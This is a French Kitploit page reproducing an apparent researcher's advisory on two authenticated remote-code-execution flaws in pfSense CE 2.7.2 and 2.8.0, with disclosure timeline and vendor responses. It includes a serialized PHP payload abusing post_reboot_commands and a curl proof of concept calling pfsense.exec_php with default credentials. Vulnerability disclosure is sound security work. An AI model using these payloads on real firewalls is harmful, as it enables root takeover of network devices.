Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-69690-CVE-2025-69691 — RCE authentifié dans Netgate pfSense CE 2.7.2 et 2.8.0 | Kitploit
Outils/GitHubGitHub/privlabs/cve-2025-69690-cve-2025-69691
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubprivlabs/cve-2025-69690-cve-2025-69691

CVE-2025-69690-CVE-2025-69691

RCE authentifié dans Netgate pfSense CE 2.7.2 et 2.8.0

Voir le dépôt
6il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔐 CVE-2025-69690 & CVE-2025-69691

Exécution de code à distance authentifiée dans Netgate pfSense Community Edition

CVE CVE CVSS Vendor Status


📋 Résumé

ChampDétails
ChercheurNelson Adhepeau (@privlabs)
FournisseurNetgate
ProduitpfSense Community Edition
Versions2.7.2 et 2.8.0
TypeExécution de code à distance authentifiée
DivulgationFévrier 2026
Fournisseur notifié2 décembre 2025
CVE attribué28 janvier 2026

⚠️ Avertissement

Cette recherche a été menée dans des environnements de laboratoire isolés à des fins éducatives et de sensibilisation à la sécurité uniquement. Toutes les découvertes ont été divulguées de manière responsable au fournisseur avant la publication. Cet avis ne constitue pas une invitation à attaquer des systèmes de production. Les tests non autorisés sont illégaux.


🎯 CVE-2025-69690

Désérialisation non sécurisée → RCE (pfSense CE 2.7.2)

ChampValeur
CVSS v3.18.8 (Élevé)
VectorAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWECWE-502, CWE-915
Type d'attaqueAuthentifié (Admin)
ComposantMécanisme de sauvegarde/restauration

Description

Le mécanisme de restauration de configuration de pfSense appelle unserialize() sur des données contrôlées par l'utilisateur sans liste blanche de classes, validation d'entrée ou sandboxing.

Un fichier de sauvegarde malveillant contenant un objet PHP sérialisé malicieux injecte des commandes arbitraires via la propriété post_reboot_commands, qui sont exécutées via mwexec() avec les privilèges root complets.

Déroulement de l'attaque

[Attacker] → Login as admin
           → Upload malicious .xml backup file
           → Trigger restore
           → pfSense calls unserialize() on attacker data
           → post_reboot_commands executed via mwexec()
           → [ROOT SHELL]

Composants affectés

  • config.php — logique de traitement de la restauration
  • classe pfsense_module_installer — cible de désérialisation non sécurisée
  • mwexec() — puits d'exécution de commandes

Charge utile PoC

O:23:"pfsense_module_installer":1:{
  s:17:"*post_reboot_commands";
  a:1:{
    i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
  }
}

Impact

  • ✅ Exécution arbitraire de commandes système en tant que root
  • ✅ Installation persistante de porte dérobée
  • ✅ Prise de contrôle complète du pare-feu
  • ✅ Exfiltration des identifiants et de la configuration

Réponse du fournisseur

"Reconnu. Classé comme abus administratif authentifié. Aucun correctif ne sera publié." — Netgate


🎯 CVE-2025-69691

XMLRPC exec_php → RCE (pfSense CE 2.8.0)

ChampValeur
CVSS v3.19.9 (Critique)
VectorAV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWECWE-284, CWE-915
Type d'attaqueAuthentifié (à distance, Auth de base)
ComposantAPI XMLRPC — pfsense.exec_php

Description

pfSense CE 2.8.0 expose une méthode XMLRPC pfsense.exec_php qui exécute du code PHP arbitraire en tant que root sans validation, sandboxing ni aucune forme de restriction.

Le point d'accès est :

  • ✅ Activé par défaut
  • ✅ Accessible à distance via HTTPS
  • ✅ Protégé uniquement par authentification de base
  • ✅ Exploitable avec les identifiants par défaut (admin:pfsense)

Déroulement de l'attaque

[Attacker] → Send XMLRPC request to /xmlrpc.php
           → Authenticate with admin:pfsense (default)
           → Call pfsense.exec_php with arbitrary PHP
           → Code executes as root, no sandboxing
           → [ROOT SHELL]

Composants affectés

  • xmlrpc.php — point d'entrée de l'API
  • pfsense.exec_php — exécution de code dynamique non sécurisée
  • couche BasicAuth — contrôle d'accès insuffisant

Preuve de concept

curl -k -u admin:pfsense \
  -H "Content-Type: text/xml" \
  -d '<methodCall>
        <methodName>pfsense.exec_php</methodName>
        <params>
          <param>
            <value><string>system("id");</string></value>
          </param>
        </params>
      </methodCall>' \
  https://<target>/xmlrpc.php

Impact

  • ✅ Compromission root à distance totale
  • ✅ Lecture/écriture arbitraire de fichiers
  • ✅ Déploiement de porte dérobée
  • ✅ Manipulation des règles du pare-feu
  • ✅ Extraction de tous les identifiants et configurations

Réponse du fournisseur

"Reconnu. Classé comme comportement attendu pour les utilisateurs authentifiés. Aucun correctif prévu." — Netgate


📅 Chronologie

November 2025     →  Vulnerabilities discovered
December 2, 2025  →  Responsible disclosure to Netgate
                  →  Vendor acknowledged, no patch planned
January 28, 2026  →  CVE IDs assigned by MITRE
February 2026     →  Public disclosure

🔗 Références

  • 🔴 CVE-2025-69690 sur cve.org
  • 🔴 CVE-2025-69691 sur cve.org
  • 📧 Divulgation complète : [email protected]

👤 Chercheur

Nelson Adhepeau — Chercheur en sécurité indépendant

LinkedIn GitHub

📧 [email protected]

Télécharger l’outil